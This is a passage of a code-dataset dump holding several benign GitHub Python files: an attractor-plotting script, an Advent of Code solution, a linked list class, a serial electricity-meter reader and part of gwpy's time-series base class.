empty\")\n return []\n\n if _contents[0] == self.default_start[0]:\n print(\"already has a content\")\n return []\n\n _results = self.default_start\n\n _matched = False\n try:\n for match_line, matcher in self.parse(_contents):\n _matched = True\n line = self.format(match_line, matcher)\n _results.append(line)\n except ContentErrorException as e:\n print(str(e))\n return []\n\n if not _matched:\n return []\n\n _results.append(\"\\n\")\n _results.extend(self.default_end)\n _results.append(\"\\n\")\n return _results\n\n\nif __name__ == \"__main__\":\n toggle = Toggle(filename='./README.md',\n url_prefix='https://github.com/Microndgt/toggle')\n print(''.join(toggle.update()))\n\n\n\n","repo_name":"Microndgt/toggle","sub_path":"toggle.py","file_name":"toggle.py","file_ext":"py","file_size_in_byte":3858,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"3"} +{"seq_id":"39543194252","text":"from AEMG.data_utils import *\nfrom AEMG.dynamics_utils import *\nfrom AEMG.mg_utils import *\n\nfrom torch.utils.data import DataLoader\nfrom tqdm import tqdm\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport argparse\nimport os\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument('--experiment',help='Directory of results inside output/',type=str,default='pendulum_lqr1k')\n parser.add_argument('--id', type=str, default=\"\")\n parser.add_argument('--print', action='store_true')\n parser.add_argument('--output_dir',type=str, default=\"\")\n parser.add_argument('--labels_file',help=\"Success/Failure labels inside output/\",type=str, default='')\n args = parser.parse_args()\n\n if args.id == \"\":\n config_fnames = os.listdir(os.path.join(\"output/\",args.experiment))\n else:\n config_fnames = [args.id]\n\n print(\"Assuming all configs have the same dataset.\")\n config_fname = os.path.join(\"output\",args.experiment,config_fnames[0], \"config.txt\")\n with open(config_fname, 'r') as f:\n config = eval(f.read())\n assert config['low_dims'] == 2, \"Only 2D systems supported\"\n\n attractors = None\n if config['system'] == 'pendulum':\n attractors = np.array([[-2.1, 0.0], [0.0, 0.0], [2.1, 0.0]])\n elif config['system'] == 'bistable':\n attractors = np.array([[-1.39]+[0.0]*9, [1.39]+[0.0]*9])\n elif config['system'] == 'cartpole':\n attractors = np.array([[0.0, 0.0, 0.0, 0.0],\n [1.0, np.pi, 0.0, 0.0],\n [-1.0, -np.pi, 0.0, 0.0]])\n else:\n if args.labels_file == '':\n print(\"No labels file provided\")\n exit(0)\n else:\n trajectories = TrajectoryDataset(config, os.path.join(\"output\", args.labels_file))\n attractors = trajectories.get_attracting_final_points()\n \n for fname in tqdm(config_fnames):\n config_fname = os.path.join(\"output\",args.experiment,fname, \"config.txt\")\n\n with open(config_fname, 'r') as f:\n config = eval(f.read())\n \n dynamics = DynamicsUtils(config)\n\n try:\n mg_out_utils = MorseGraphOutputProcessor(config)\n except FileNotFoundError or ValueError:\n exit(0)\n\n # setting the size of the plot\n fig_w=8\n fig_h=8\n fig, ax = plt.subplots(figsize=(fig_w, fig_h))\n lower_bounds = [-1,-1]\n upper_bounds = [1,1]\n d1=0\n d2=1\n fontsize=16\n tick=5\n plt.xticks(fontsize=fontsize)\n plt.yticks(fontsize=fontsize)\n ax.set_xlim([lower_bounds[d1], upper_bounds[d1]])\n ax.set_ylim([lower_bounds[d2], upper_bounds[d2]])\n plt.xticks(np.linspace(lower_bounds[d1], upper_bounds[d1], tick))\n plt.yticks(np.linspace(lower_bounds[d2], upper_bounds[d2], tick))\n ax.set_xlabel(str(d1))\n ax.set_ylabel(str(d2))\n ax.xaxis.label.set_size(fontsize)\n ax.yaxis.label.set_size(fontsize)\n\n if args.labels_file == '':\n attractors = dynamics.system.transform(attractors)\n\n for i in range(len(attractors)):\n attractor = attractors[i]\n zt = dynamics.encode(attractor)\n plt.scatter(zt[0], zt[1], color='r', marker='x',s=100, label='GT Attractor' if i==0 else None)\n \n all_attractor_centers = []\n for i in range(mg_out_utils.get_num_attractors()):\n attractor_tiles = mg_out_utils.get_corner_points_of_attractor(mg_out_utils.attractor_nodes[i])\n attractor_mean_corner_points = np.mean(attractor_tiles, axis=0)\n attractor_center = (attractor_mean_corner_points[:config['low_dims']] + attractor_mean_corner_points[config['low_dims']:]) / 2.0\n if args.print:\n print(\"Obtained Attractor {}:\".format(i))\n print(dynamics.system.inverse_transform(dynamics.decode(attractor_center)))\n for j in range(attractor_tiles.shape[0]):\n cp_low = attractor_tiles[j, :config['low_dims']]\n cp_high = attractor_tiles[j, config['low_dims']:]\n tile_center = (cp_low + cp_high) / 2.0\n plt.scatter(tile_center[0], tile_center[1], color='b', s = 100./attractor_tiles.shape[0], marker='.',label='MG Attractor' if i==0 and j==0 else None)\n \n plt.legend(loc='best')\n \n if args.output_dir:\n plt.savefig(os.path.join(args.output_dir,fname+\"_attractors.png\"))\n else:\n plt.savefig(os.path.join(config['output_dir'], \"attractors.png\"))\n plt.close()\n","repo_name":"aravindsiv/AEMG","sub_path":"examples/visualize_attractors.py","file_name":"visualize_attractors.py","file_ext":"py","file_size_in_byte":4617,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"37997324046","text":"import os\nfrom colorama import Fore\n\nprint(os.getcwd())\n\nwith open('input.txt') as input:\n lines = input.readlines()\n\ndef find_at_most_100000(lines):\n dir_sizes = dict()\n filenames = set()\n stack = []\n\n for line in lines:\n #print(Fore.LIGHTYELLOW_EX + 'dir_sizes', dir_sizes)\n line = line.strip('\\n')\n print(Fore.RED + 'stack', stack)\n\n # command\n if line.startswith('$'):\n print(Fore.GREEN + 'command', line)\n # cd\n if line.startswith('$ cd'):\n if line == '$ cd ..':\n stack.pop()\n elif line.startswith('$ cd /'):\n if line == '$ cd /':\n print('back to root')\n stack = ['/']\n else:\n stack = line[5:].split('/')[1:]\n stack.insert(0, '/')\n print('ABSOLUTE PATH', stack)\n elif line.startswith('$ cd '):\n stack.append(line[5:])\n else: #output\n # file\n print(Fore.CYAN + line)\n file = '/'.join(stack) + '/' + line.split(' ')[1]\n if line.split(' ')[0] == 'dir':\n pass\n else: # file\n #print('file_size', line.split()[0])\n print('filepath', file)\n #print('filenames', filenames)\n file_size = int(line.split(' ')[0])\n if file not in filenames:\n filenames.add(file)\n # add to every dir in stack\n for i, dir in enumerate(stack): # get the full path\n dir = '/'.join(stack[:i + 1])\n dir_sizes[dir] = dir_sizes.get(dir, 0) + file_size\n total = 0 # add total sum of less than 1000000\n\n # total space is 70000000\n unused_space = 70000000 - dir_sizes['/']\n smallest_after_30000000 = float('inf')\n for i, (k, v) in enumerate(dir_sizes.items()):\n if v + unused_space >= 30000000:\n smallest_after_30000000 = min(smallest_after_30000000, v)\n print(k, v)\n if v <= 100000:\n total += v\n print('smallest after 30000000', smallest_after_30000000)\n \n #for filename in filenames:\n # print(filename)\n #print(dir_sizes)\n #print(filenames)\n print('total used', dir_sizes['/'])\n return total\n\n\n#print(find_at_most_100000(lines[:50]))\n# 1325919 is the answer\n# 48,381,165 is the total space\nprint('at most 1000000', find_at_most_100000(lines))\n","repo_name":"AlexHappyCode/AdventOfCode2022","sub_path":"day7/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2565,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"25550629396","text":"class Node:\n def __init__(self, data):\n self.data = data\n self.next = None\n\nclass SLL:\n def __init__(self):\n self.head = None\n\n def insert_last(self, data):\n newNode = Node(data)\n\n if self.head is None:\n self.head = newNode\n return\n \n currentNode = self.head\n while currentNode.next:\n currentNode = currentNode.next\n\n currentNode.next = newNode\n\n def insert_first(self, data):\n newNode = Node(data)\n\n if self.head is None:\n self.head = newNode\n return\n \n newNode.next = self.head\n self.head = newNode\n\n def search(self, key):\n currentNode = self.head\n while currentNode:\n if currentNode.data == key:\n return True\n currentNode = currentNode.next\n return False\n \n def insert_after(self, key, data):\n currentNode = self.head\n while currentNode:\n if currentNode.data == key:\n newNode = Node(data)\n newNode.next = currentNode.next\n currentNode.next = newNode\n return True\n currentNode = currentNode.next\n return False\n \n def insert_before(self, key, data):\n if self.head is None:\n return False\n if self.head.data == key:\n newNode = Node(data)\n newNode.next = self.head\n self.head = newNode\n return True\n currentNode = self.head\n while currentNode.next:\n if currentNode.next.data == key:\n newNode = Node(data)\n newNode.next = currentNode.next\n currentNode.next = newNode\n return True\n currentNode = currentNode.next\n return False\n \n def delete_nth_occurence(self, key, n):\n currentNode = self.head\n count = 1\n prev = None\n while currentNode:\n if currentNode.data == key:\n if count == n:\n if prev is None:\n self.head = currentNode.next\n else:\n prev.next = currentNode.next\n return True\n count += 1\n prev = currentNode\n currentNode = currentNode.next\n return False\n \n def delete_first(self):\n if self.head is None:\n return False\n self.head = self.head.next\n return True\n \n def delete_last(self):\n if self.head is None:\n return False\n if self.head.next is None:\n self.head = None\n return True\n currentNode = self.head\n while currentNode.next.next:\n currentNode = currentNode.next\n currentNode.next = None\n return True\n \n def delete_all_occurences(self, key):\n if self.head is None:\n return False\n while self.head and self.head.data == key:\n self.head = self.head.next\n currentNode = self.head\n while currentNode.next:\n if currentNode.next.data == key:\n currentNode.next = currentNode.next.next\n else:\n currentNode = currentNode.next\n return True\n \n def print_list(self):\n if self.head is None:\n print('List is empty')\n return\n currentNode = self.head\n while currentNode:\n print(currentNode.data, end=\" -> \")\n currentNode = currentNode.next\n print()\n \n\nsll = SLL()\n\nsll.insert_last(1)\nsll.insert_last(2)\nsll.insert_last(3)\nsll.insert_last(4)\nsll.insert_last(5)\nsll.insert_last(6)\nsll.insert_last(7)\n\nsll.insert_first(0)\nsll.insert_first(0)\nsll.insert_first(0)\n\nsll.print_list()\n\nprint(sll.search(0))\nprint(sll.search(1))\nprint(sll.search(2))\nprint(sll.search(3))\nprint(sll.search(4))\n\nprint(sll.delete_nth_occurence(0, 1))\nprint(sll.delete_nth_occurence(0, 1))\nprint(sll.delete_nth_occurence(0, 1))\n\nsll.print_list()\n\nprint(sll.delete_first())\nprint(sll.delete_first())\nprint(sll.delete_first())\n\nsll.print_list()\n\nprint(sll.delete_last())\nprint(sll.delete_last())\nprint(sll.delete_last())\n\nsll.print_list()\n\nprint(sll.delete_all_occurences(1))\n\nsll.print_list()","repo_name":"Ashrockzzz2003/Data_Structures_and_Algorithms","sub_path":"linear/linked_list/singly_linked_list.py","file_name":"singly_linked_list.py","file_ext":"py","file_size_in_byte":4298,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"32974768393","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport serial\n\nclass ReadMsg():\n\tdef __init__(self):\n\t\t#假设初始化成功\n\t\tself.status = True\n\t\t#初始化串口\n\t\ttry:\n\t\t\tself.ser = serial.Serial(\n\t\t\t#\t'/dev/ttyAMA0',\t\t\t\t\t#linux系统的串口号,windows为COM1等\n\t\t\t#\t'/dev/ttyUSB0',\n\t\t\t\t'COM3',\n\t\t\t\tbaudrate=2400,\t\t\t\t\t#设置为电表默认波特率\n\t\t\t\tbytesize=serial.EIGHTBITS,\t\t#8位\n\t\t\t\tparity=serial.PARITY_EVEN,\t\t#偶校验,电表(DL/T645-2007)为偶校验\n\t\t\t\tstopbits=serial.STOPBITS_ONE,\t#1位停止位\n\t\t\t\ttimeout=0.5\t\t\t\t\t\t#读超时,单位为秒\n\t\t\t\t)\n\t\texcept:\n\t\t\t#初始化失败标志\n\t\t\tself.status = False\n\n\t\t#初始化电表字典\n\t\tself.dianbiao = {\n\t\t\t\t'201':['010097796152','-1','-1'],\n\t\t\t\t'202':['010126762145','-1','-1'],\n\t\t\t\t'301':['010097796152','-1','-1'],\n\t\t\t\t'302':['010126762145','-1','-1'],\n\t\t\t\t'401':['010097796152','-1','-1'],\n\t\t\t\t'402':['010126762146','-1','-1'],\n\t\t\t\t'501':['010097796153','-1','-1'],\n\t\t\t\t'502':['010126762145','-1','-1'],\n\t\t\t\t'601':['010097796152','-1','-1'],\n\t\t\t\t'602':['010126762145','-1','-1'],\n\t\t\t\t'701':['010097796152','-1','-1'],\n\t\t\t\t'702':['010097796151','-1','-1'],\n\t\t\t\t'801':['010097796152','-1','-1'],\n\t\t\t\t'802':['010126762145','-1','-1'],\n\t\t\t\t'901':['010097796152','-1','-1'],\n\t\t\t\t'902':['010126762145','-1','-1'],\n\t\t\t\t'1001':['010097796152','-1','-1'],\n\t\t\t\t'1002':['010126762145','-1','-1'],\n\t\t\t\t'1101':['010097796152','-1','-1'],\n\t\t\t\t'1102':['010097796152','-1','-1'],\n\t\t\t\t'1201':['010097796151','-1','-1'],\n\t\t\t\t'1202':['010126762145','-1','-1'],\n\t\t\t\t'1301':['010097796152','-1','-1'],\n\t\t\t\t'1302':['010126762145','-1','-1'],\n\t\t\t\t'1401':['010097796152','-1','-1'],\n\t\t\t\t'1402':['010126762145','-1','-1'],\n\t\t\t\t'1501':['010097796152','-1','-1'],\n\t\t\t\t'1502':['010097796152','-1','-1']\n\t\t\t\t}\n\n\t\t#设置tuple,存储读取数据块命令\n\t\tself.zuheyougong = ('0x33','0x33','0x33','0x33')\t\t\t\t#组合有功\n\t\tself.zhengxiang = ('0x33','0x33','0x34','0x33')\t\t\t\t\t#正向有功\n\t\tself.zuhejiesuan1 = ('0x34','0x33','0x33','0x33')\t\t\t\t#上1个结算日组合有功\n\t\tself.zxjiesuan1 = ('0x34','0x33','0x34','0x33')\t\t\t\t\t#上1个结算日正向有功\n\t\tself.zuhejiesuan2 = ('0x35','0x33','0x33','0x33')\t\t\t\t#上2个结算日组合有功\n\t\tself.zxjiesuan2 = ('0x35','0x33','0x34','0x33')\t\t\t\t\t#上2个结算日正向有功\n\n\tdef CreatMsg(self,list,tuple):\n\t\tmsg = [hex(x) for x in bytes.fromhex(list[0])]\t#地址,16进制数组转为字节串\n\t\tmsg.reverse()\t\t\t\t\t\t#小端在前\n\t\tmsg.insert(0,'0x68')\t\t\t\t#68H开头\n\t\tmsg.append('0x68')\t\t\t\t\t#地址码后面加68H\n\t\tmsg.append('0x11')\t\t\t\t\t#控制字11H,表示读数据\n\t\tmsg.append('0x04')\t\t\t\t\t#数据域长度,0字节\n\t\tfor x in tuple : msg.append(x)\t\t#加入数据块命令\n\t\tmsg.append(hex(sum([int(x,16) for x in msg])&0x00000000FF))\t#校验码\n\t\tmsg.append('0x16')\n\t\tmsg=bytes([int(x,16) for x in msg])\t\t#数组转为16进制字符串\n\t\treturn msg\n\n\tdef DecodeMsg(self,by):\t\t\t\t\t\t\t\t\t\t\t#str为字节串\n\t\tmsg = [x for x in bytes(by)]\t\t\t\t\t\t\t\t#转为16进制数组\n\t\twhile msg[0] != 0x68:\tmsg.pop(0)\t\t\t\t\t\t\t#去除开头的唤醒数据\n\t\t#校验数据是否正确,若不正确,则返回False\n\t\tif msg[-2] != (sum(x for x in msg[:-2])&0x00000000FF):\t\t#计算校验码\n\t\t\treturn False\n\t\t\n\t\taddress = msg[1:7]\t\t\t\t\t\t\t\t\t\t\t#获取电表地址\n\t\taddress.reverse()\t\t\t\t\t\t\t\t\t\t\t#改为大端在前\n\t\taddress = [(x>>4&0x0F)*10+(x&0x0F) for x in address]\t\t#BCD码转换公式\n\t\taddress = ''.join(str(x) for x in address)\n\t\tif msg[8] == 0x91 :\n\t\t\tdl = msg[10:-2]\n\t\t\tdl.reverse()\n\t\t\tdl = [x-0x33 for x in dl]\t\t\t\t\t\t\t\t#接收方,减0x33处理\n\t\t\tdl = [(x>>4&0x0F)*10+(x&0x0F) for x in dl]\t\t\t\t#BCD码转换公式\n\t\t\tresult = 0.0\n\t\t\tfor x in dl[:-4]:\t\t\t\n\t\t\t\tresult = result*100+x\n\t\t\treturn address,result/100\n\t\treturn address\n\n\tdef send(self):\n\t\tif self.ser.isOpen():\n\t\t\tpass\n\t\telse:\n\t\t\tself.ser.open()\n\t\t#开始读表\n\t\tfor k,v in self.dianbiao.items():\n\t\t\t#读取正向有功\n\t\t\tself.ser.write(self.CreatMsg(self.dianbiao[k],self.zhengxiang))\n\t\t\ts = self.ser.readline()\n\t\t\tif s == b'':\n\t\t\t\tself.dianbiao[k][1] = '失败'\n\t\t\telse:\n\t\t\t\tself.dianbiao[k][1] = self.DecodeMsg(s)[1]\n\t\t\t#读取上一个结算日正向有功\n\t\t\tself.ser.write(self.CreatMsg(self.dianbiao[k],self.zxjiesuan1))\n\t\t\ts = self.ser.readline()\n\t\t\tif s == b'':\n\t\t\t\tself.dianbiao[k][2] = '失败'\n\t\t\telse:\n\t\t\t\tself.dianbiao[k][2] = self.DecodeMsg(s)[1]\n\t\tself.ser.close()\n\n\tdef achieve(self):\n\t\t#打开串口\n\t\tif self.ser.isOpen():\n\t\t\tpass\n\t\telse:\n\t\t\tself.ser.open()\n\t\tfor room,data in self.dianbiao.items():\n\t\t\t#读取正向有功\n\t\t\tself.ser.write(self.CreatMsg(self.dianbiao[room],self.zhengxiang))\n\t\t\ts = self.ser.read()\n\t\t\tif s != b'':\n\t\t\t\twhile(ord(s) != 0x68):\n\t\t\t\t\ts = self.ser.read()\n\t\t\t\tfor i in range(8):\n\t\t\t\t\ts += self.ser.read()\n\t\t\t\tL = self.ser.read()\n\t\t\t\ts += L\n\t\t\t\tfor i in range(ord(L)+2):\n\t\t\t\t\ts += self.ser.read()\n\t\t\t\tresult = self.DecodeMsg(s)\n\t\t\t\tif result != False:\n\t\t\t\t\tself.dianbiao[room][1] = result[1]\n\t\t\t\telse:\n\t\t\t\t\tself.dianbiao[room][1] = '失败'\n\t\t\telse:\n\t\t\t\tself.dianbiao[room][1] = '失败'\n\t\t\tself.ser.reset_input_buffer()\n\t\t\t#读取上一个结算日正向有功\n\t\t\tself.ser.write(self.CreatMsg(self.dianbiao[room],self.zxjiesuan1))\n\t\t\ts = self.ser.read()\n\t\t\tif s != b'':\n\t\t\t\twhile(ord(s) != 0x68):\n\t\t\t\t\ts = self.ser.read()\n\t\t\t\tfor i in range(8):\n\t\t\t\t\ts += self.ser.read()\n\t\t\t\tL = self.ser.read()\n\t\t\t\ts += L\n\t\t\t\tfor i in range(ord(L)+2):\n\t\t\t\t\ts += self.ser.read()\n\t\t\t\tresult = self.DecodeMsg(s)\n\t\t\t\tif result != False:\n\t\t\t\t\tself.dianbiao[room][2] = result[1]\n\t\t\t\telse:\n\t\t\t\t\tself.dianbiao[room][2] = '失败'\n\t\t\telse:\n\t\t\t\tself.dianbiao[room][2] = '失败'\n\t\t\tself.ser.reset_input_buffer()\n\t\t#关闭串口\n\t\tself.ser.close()\n\t\n\tdef __del__(self):\n\t\tif self.ser.isOpen():\n\t\t\tself.ser.close() \n\t\tprint('串口已关闭!')","repo_name":"lwpo2008/WattMeter","sub_path":"wattmeter.py","file_name":"wattmeter.py","file_ext":"py","file_size_in_byte":5724,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"3"} +{"seq_id":"13042059543","text":"import sys\nimport warnings\nfrom collections import OrderedDict\nfrom math import ceil\n\nimport numpy\n\nfrom astropy import units\nfrom astropy.io import registry as io_registry\n\nfrom gwosc.api import DEFAULT_URL as GWOSC_DEFAULT_HOST\n\nfrom ..types import Series\nfrom ..detector import (Channel, ChannelList)\nfrom ..segments import SegmentList\nfrom ..time import (Time, LIGOTimeGPS, gps_types, to_gps)\nfrom ..utils import gprint\n\n__author__ = 'Duncan Macleod '\n\n__all__ = ['TimeSeriesBase', 'TimeSeriesBaseDict', 'TimeSeriesBaseList']\n\n\n_UFUNC_STRING = {\n 'less': '<',\n 'less_equal': '<=',\n 'equal': '==',\n 'greater_equal': '>=',\n 'greater': '>',\n}\n\n\n# -- utilities ----------------------------------------------------------------\n\ndef _format_time(gps):\n if isinstance(gps, gps_types):\n return float(gps)\n if isinstance(gps, Time):\n return gps.gps\n return gps\n\n\ndef _dynamic_scaled(scaled, channel):\n \"\"\"Determine default for scaled based on channel name\n\n This is mainly to work around LIGO not correctly recording ADC\n scaling parameters for most of Advanced LIGO (through 2023).\n Scaling parameters for H0 and L0 data are also not correct\n starting in mid-2020.\n\n Parameters\n ----------\n scaled : `bool`, `None`\n the scaled argument as given by the user\n\n channel : `str`\n the name of the channel to be read\n\n Returns\n -------\n scaled : `bool`\n `False` if channel is from LIGO, otherwise `True`\n\n Examples\n --------\n >>> _dynamic_scaled(None, \"H1:channel\")\n False\n >>> _dynamic_scaled(None, \"V1:channel\")\n True\n \"\"\"\n if scaled is not None:\n return scaled\n return not str(channel).startswith((\"H0\", \"L0\", \"H1\", \"L1\"))\n\n\n# -- TimeSeriesBase------------------------------------------------------------\n\nclass TimeSeriesBase(Series):\n \"\"\"An `Array` with time-domain metadata.\n\n Parameters\n ----------\n value : array-like\n input data array\n\n unit : `~astropy.units.Unit`, optional\n physical unit of these data\n\n t0 : `~gwpy.time.LIGOTimeGPS`, `float`, `str`, optional\n GPS epoch associated with these data,\n any input parsable by `~gwpy.time.to_gps` is fine\n\n dt : `float`, `~astropy.units.Quantity`, optional, default: `1`\n time between successive samples (seconds), can also be given inversely\n via `sample_rate`\n\n sample_rate : `float`, `~astropy.units.Quantity`, optional, default: `1`\n the rate of samples per second (Hertz), can also be given inversely\n via `dt`\n\n times : `array-like`\n the complete array of GPS times accompanying the data for this series.\n This argument takes precedence over `t0` and `dt` so should be given\n in place of these if relevant, not alongside\n\n name : `str`, optional\n descriptive title for this array\n\n channel : `~gwpy.detector.Channel`, `str`, optional\n source data stream for these data\n\n dtype : `~numpy.dtype`, optional\n input data type\n\n copy : `bool`, optional, default: `False`\n choose to copy the input data to new memory\n\n subok : `bool`, optional, default: `True`\n allow passing of sub-classes by the array generator\n \"\"\"\n _default_xunit = units.second\n _print_slots = ('t0', 'dt', 'name', 'channel')\n DictClass = None\n\n def __new__(cls, data, unit=None, t0=None, dt=None, sample_rate=None,\n times=None, channel=None, name=None, **kwargs):\n \"\"\"Generate a new `TimeSeriesBase`.\n \"\"\"\n # parse t0 or epoch\n epoch = kwargs.pop('epoch', None)\n if epoch is not None and t0 is not None:\n raise ValueError(\"give only one of epoch or t0\")\n if epoch is None and t0 is not None:\n kwargs['x0'] = _format_time(t0)\n elif epoch is not None:\n kwargs['x0'] = _format_time(epoch)\n # parse sample_rate or dt\n if sample_rate is not None and dt is not None:\n raise ValueError(\"give only one of sample_rate or dt\")\n if sample_rate is None and dt is not None:\n kwargs['dx'] = dt\n # parse times\n if times is not None:\n kwargs['xindex'] = times\n\n # generate TimeSeries\n new = super().__new__(cls, data, name=name, unit=unit,\n channel=channel, **kwargs)\n\n # manually set sample_rate if given\n if sample_rate is not None:\n new.sample_rate = sample_rate\n\n return new\n\n # -- TimeSeries properties ------------------\n\n # rename properties from the Series\n t0 = Series.x0\n dt = Series.dx\n span = Series.xspan\n times = Series.xindex\n\n # -- epoch\n # this gets redefined to attach to the t0 property\n @property\n def epoch(self):\n \"\"\"GPS epoch for these data.\n\n This attribute is stored internally by the `t0` attribute\n\n :type: `~astropy.time.Time`\n \"\"\"\n try:\n return Time(self.t0, format='gps', scale='utc')\n except AttributeError:\n return None\n\n @epoch.setter\n def epoch(self, epoch):\n if epoch is None:\n del self.t0\n elif isinstance(epoch, Time):\n self.t0 = epoch.gps\n else:\n try:\n self.t0 = to_gps(epoch)\n except TypeError:\n self.t0 = epoch\n\n # -- sample_rate\n @property\n def sample_rate(self):\n \"\"\"Data rate for this `TimeSeries` in samples per second (Hertz).\n\n This attribute is stored internally by the `dx` attribute\n\n :type: `~astropy.units.Quantity` scalar\n \"\"\"\n return (1 / self.dt).to('Hertz')\n\n @sample_rate.setter\n def sample_rate(self, val):\n if val is None:\n del self.dt\n return\n self.dt = (1 / units.Quantity(val, units.Hertz)).to(self.xunit)\n\n # -- duration\n @property\n def duration(self):\n \"\"\"Duration of this series in seconds\n\n :type: `~astropy.units.Quantity` scalar\n \"\"\"\n return units.Quantity(self.span[1] - self.span[0], self.xunit,\n dtype=float)\n\n # -- TimeSeries accessors -------------------\n\n @classmethod\n def read(cls, source, *args, **kwargs):\n \"\"\"Read data into a `TimeSeries`\n\n Arguments and keywords depend on the output format, see the\n online documentation for full details for each format, the parameters\n below are common to most formats.\n\n Parameters\n ----------\n source : `str`, `list`\n Source of data, any of the following:\n\n - `str` path of single data file,\n - `str` path of LAL-format cache file,\n - `list` of paths.\n\n name : `str`, `~gwpy.detector.Channel`\n the name of the channel to read, or a `Channel` object.\n\n start : `~gwpy.time.LIGOTimeGPS`, `float`, `str`, optional\n GPS start time of required data, defaults to start of data found;\n any input parseable by `~gwpy.time.to_gps` is fine\n\n end : `~gwpy.time.LIGOTimeGPS`, `float`, `str`, optional\n GPS end time of required data, defaults to end of data found;\n any input parseable by `~gwpy.time.to_gps` is fine\n\n format : `str`, optional\n source format identifier. If not given, the format will be\n detected if possible. See below for list of acceptable\n formats.\n\n nproc : `int`, optional\n number of parallel processes to use, serial process by\n default.\n\n pad : `float`, optional\n value with which to fill gaps in the source data,\n by default gaps will result in a `ValueError`.\n\n Raises\n ------\n IndexError\n if ``source`` is an empty list\n\n Notes\n -----\"\"\"\n from .io.core import read as timeseries_reader\n return timeseries_reader(cls, source, *args, **kwargs)\n\n def write(self, target, *args, **kwargs):\n \"\"\"Write this `TimeSeries` to a file\n\n Parameters\n ----------\n target : `str`\n path of output file\n\n format : `str`, optional\n output format identifier. If not given, the format will be\n detected if possible. See below for list of acceptable\n formats.\n\n Notes\n -----\"\"\"\n return io_registry.write(self, target, *args, **kwargs)\n\n @classmethod\n def fetch(cls, channel, start, end, host=None, port=None, verbose=False,\n connection=None, verify=False, pad=None, allow_tape=None,\n scaled=None, type=None, dtype=None):\n \"\"\"Fetch data from NDS\n\n Parameters\n ----------\n channel : `str`, `~gwpy.detector.Channel`\n the data channel for which to query\n\n start : `~gwpy.time.LIGOTimeGPS`, `float`, `str`\n GPS start time of required data,\n any input parseable by `~gwpy.time.to_gps` is fine\n\n end : `~gwpy.time.LIGOTimeGPS`, `float`, `str`\n GPS end time of required data,\n any input parseable by `~gwpy.time.to_gps` is fine\n\n host : `str`, optional\n URL of NDS server to use, if blank will try any server\n (in a relatively sensible order) to get the data\n\n port : `int`, optional\n port number for NDS server query, must be given with `host`\n\n verify : `bool`, optional, default: `False`\n check channels exist in database before asking for data\n\n scaled : `bool`, optional\n apply slope and bias calibration to ADC data, for non-ADC data\n this option has no effect\n\n connection : `nds2.connection`, optional\n open NDS connection to use\n\n verbose : `bool`, optional\n print verbose output about NDS progress, useful for debugging;\n if ``verbose`` is specified as a string, this defines the\n prefix for the progress meter\n\n type : `int`, optional\n NDS2 channel type integer or string name to match\n\n dtype : `type`, `numpy.dtype`, `str`, optional\n NDS2 data type to match\n \"\"\"\n return cls.DictClass.fetch(\n [channel], start, end, host=host, port=port, verbose=verbose,\n connection=connection, verify=verify, pad=pad, scaled=scaled,\n allow_tape=allow_tape, type=type, dtype=dtype)[str(channel)]\n\n @classmethod\n def fetch_open_data(cls, ifo, start, end, sample_rate=4096,\n version=None, format='hdf5',\n host=GWOSC_DEFAULT_HOST, verbose=False,\n cache=None, **kwargs):\n \"\"\"Fetch open-access data from the LIGO Open Science Center\n\n Parameters\n ----------\n ifo : `str`\n the two-character prefix of the IFO in which you are interested,\n e.g. `'L1'`\n\n start : `~gwpy.time.LIGOTimeGPS`, `float`, `str`, optional\n GPS start time of required data, defaults to start of data found;\n any input parseable by `~gwpy.time.to_gps` is fine\n\n end : `~gwpy.time.LIGOTimeGPS`, `float`, `str`, optional\n GPS end time of required data, defaults to end of data found;\n any input parseable by `~gwpy.time.to_gps` is fine\n\n sample_rate : `float`, optional,\n the sample rate of desired data; most data are stored\n by GWOSC at 4096 Hz, however there may be event-related\n data releases with a 16384 Hz rate, default: `4096`\n\n version : `int`, optional\n version of files to download, defaults to highest discovered\n version\n\n format : `str`, optional\n the data format to download and parse, default: ``'h5py'``\n\n - ``'hdf5'``\n - ``'gwf'`` - requires |LDAStools.frameCPP|_\n\n host : `str`, optional\n HTTP host name of GWOSC server to access\n\n verbose : `bool`, optional, default: `False`\n print verbose output while fetching data\n\n cache : `bool`, optional\n save/read a local copy of the remote URL, default: `False`;\n useful if the same remote data are to be accessed multiple times.\n Set `GWPY_CACHE=1` in the environment to auto-cache.\n\n **kwargs\n any other keyword arguments are passed to the `TimeSeries.read`\n method that parses the file that was downloaded\n\n Examples\n --------\n >>> from gwpy.timeseries import (TimeSeries, StateVector)\n >>> print(TimeSeries.fetch_open_data('H1', 1126259446, 1126259478))\n TimeSeries([ 2.17704028e-19, 2.08763900e-19, 2.39681183e-19,\n ..., 3.55365541e-20, 6.33533516e-20,\n 7.58121195e-20]\n unit: Unit(dimensionless),\n t0: 1126259446.0 s,\n dt: 0.000244140625 s,\n name: Strain,\n channel: None)\n >>> print(StateVector.fetch_open_data('H1', 1126259446, 1126259478))\n StateVector([127,127,127,127,127,127,127,127,127,127,127,127,\n 127,127,127,127,127,127,127,127,127,127,127,127,\n 127,127,127,127,127,127,127,127]\n unit: Unit(dimensionless),\n t0: 1126259446.0 s,\n dt: 1.0 s,\n name: Data quality,\n channel: None,\n bits: Bits(0: data present\n 1: passes cbc CAT1 test\n 2: passes cbc CAT2 test\n 3: passes cbc CAT3 test\n 4: passes burst CAT1 test\n 5: passes burst CAT2 test\n 6: passes burst CAT3 test,\n channel=None,\n epoch=1126259446.0))\n\n For the `StateVector`, the naming of the bits will be\n ``format``-dependent, because they are recorded differently by GWOSC\n in different formats.\n\n Notes\n -----\n `StateVector` data are not available in ``txt.gz`` format.\n \"\"\"\n from .io.losc import fetch_gwosc_data\n return fetch_gwosc_data(\n ifo,\n start,\n end,\n sample_rate=sample_rate,\n version=version,\n format=format,\n verbose=verbose,\n cache=cache,\n host=host,\n cls=cls,\n **kwargs,\n )\n\n @classmethod\n def find(cls, channel, start, end, frametype=None, 